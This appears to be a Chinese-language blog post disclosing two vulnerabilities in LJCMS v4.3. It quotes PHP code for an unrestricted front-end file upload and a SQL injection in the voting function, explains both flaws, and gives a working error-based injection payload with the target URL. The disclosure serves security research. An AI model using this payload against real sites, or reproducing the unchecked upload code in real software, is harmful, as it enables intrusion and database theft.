admin

LJCMS漏洞集合
LJCMS Version v4.3.R60321前台任意文件上传漏洞位置:source/control/inde...
扫描右侧二维码阅读全文
07
2019/10

LJCMS漏洞集合

LJCMS Version v4.3.R60321

前台任意文件上传

漏洞位置:source/control/index/user.php
函数:control_uploadLine:1077~1119

$file=$_FILES;
//            print_r($_FILES);die;
        $saveurl = "";
        $tmp_name=str_replace('\\\\', '\\', $_FILES['file']['tmp_name']);

        $str =$file['file']['name'];
        $arr = explode('.', $str);
        $num = count($arr) - 1;
        $type = $arr[$num];

        $filename = date("YmdHis") . rand(0000, 9999) . "." . $type;
        if($type=="rar" || $type=="zip"){
            $destination_folder = 'data/attachment/template/' . date('Ym') . '/'; //上传文件路径
        } else {
            $destination_folder = 'data/attachment/kefu/' . date('Ym') . '/'; //上传文件路径
        }


        if (!file_exists($destination_folder)) {
            mkdir($destination_folder);
        }
        $destination = $destination_folder.$filename;

        $PHP_SELF=$_SERVER['PHP_SELF'];

        $url='http://'.$_SERVER['HTTP_HOST'].substr($PHP_SELF,0,strrpos($PHP_SELF,'/')+1);

        if(move_uploaded_file($tmp_name,$destination)){

            $array=[
                'pic'=>$destination,
            ];
            parent::$obj->update('oa_user', $array, ' id='.$user_id.'');
            $data['code']=200;
            $data['name']=$url.$destination;
            $data['name1']=$destination;
            echo json_encode($data);
        } else {
            $arr=[
                'code'=>10001,
            ];
            echo json_encode($arr);
        }

流程:

  1. 获取了传入进来的$_FILES
  2. 将文件名中的tmp_name包含的\\\\替换为\\
  3. 接下来获取了文件名以及文件后缀名,设置保存的文件名为时间+随机数+获取到的后缀名
  4. 在Line1080根据文件后缀设置不同的保存路径
  5. 之后判断了文件保存文件夹是否存在不存在则创建文件夹,没有对后缀名进行任何对限制
  6. 在Line:1104直接执行了move_uploaded_file导致了任意文件上传漏洞

前台question一处sql注入

漏洞位置:source/control/index/question.php
code:

 public function control_vote(){
        $queid=$_REQUEST['queid'];
        $topicid=$_REQUEST['topicid'];
        $optionid=$_REQUEST['optionid'];
        if(empty($queid)){
            print_r(json_encode(['msg'=>'缺少queid参数','code'=>10001]));
            die;
        }
        if(empty($topicid)){
            print_r(json_encode(['msg'=>'缺少topicid参数','code'=>10002]));
            die;
        }
        if(empty($optionid)){
            print_r(json_encode(['msg'=>'缺少optionid参数','code'=>10003]));
            die;
        }

        # 修改投票总数
        $sql="select * from 8cms_question where topicid=$topicid and queid=$queid";
        $question_list=parent::$obj->fetch_first($sql);

在sql语句

$sql="select * from 8cms_question where topicid=$topicid and queid=$queid";

$queid$topicid没有进行单引号包裹,虽然全局检测了gpc是否开启,以及对post、get、cookie等传入的方式进行了addslashes,但是在这里将不会起任何防御措施
payload:

http://site/index.php?c=question&a=vote
post:
queid=1 and updatexml(1,concat(1,user(),1),1)&topicid=1&optionid=1

queid或者topicid都可以进行注入
验证:

Last modification:November 28th, 2019 at 04:27 pm
If you think my article is useful to you, please feel free to appreciate

Leave a Comment